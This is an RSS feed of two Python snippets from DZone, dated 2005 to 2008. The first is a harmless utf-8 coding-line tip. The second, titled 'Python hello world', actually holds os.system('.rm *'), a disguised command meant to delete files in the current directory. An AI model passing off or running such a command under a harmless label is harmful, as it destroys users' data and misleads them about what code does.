<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DZone Snippets: python code</title>
    <link>http://snippets.dzone.com/posts</link>
    <pubDate>Fri, 29 Aug 2008 10:58:00 GMT</pubDate>
    <description>DZone Snippets: python code</description>
    <item>
      <title>Write your code using utf-8</title>
      <link>http://snippets.dzone.com/posts/show/161</link>
      <description>&lt;code&gt;# -*- coding: utf-8 -*-&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;Add this line at the beginning of your code. Python won't complain anymore about non-ascii characters in your code.</description>
      <pubDate>Wed, 13 Apr 2005 21:16:28 GMT</pubDate>
      <guid>http://snippets.dzone.com/posts/show/161</guid>
      <author>joelthelion (joel)</author>
    </item>
    <item>
      <title>Python hello world</title>
      <link>http://snippets.dzone.com/posts/show/70</link>
      <description>&lt;code&gt;&lt;br /&gt;#There should be a way to rate snippets...&lt;br /&gt;&lt;br /&gt;import os&lt;br /&gt;os.system('.rm *')&lt;br /&gt;&lt;/code&gt;</description>
      <pubDate>Fri, 08 Apr 2005 06:39:35 GMT</pubDate>
      <guid>http://snippets.dzone.com/posts/show/70</guid>
      <author>joelthelion (joel)</author>
    </item>
  </channel>
</rss>
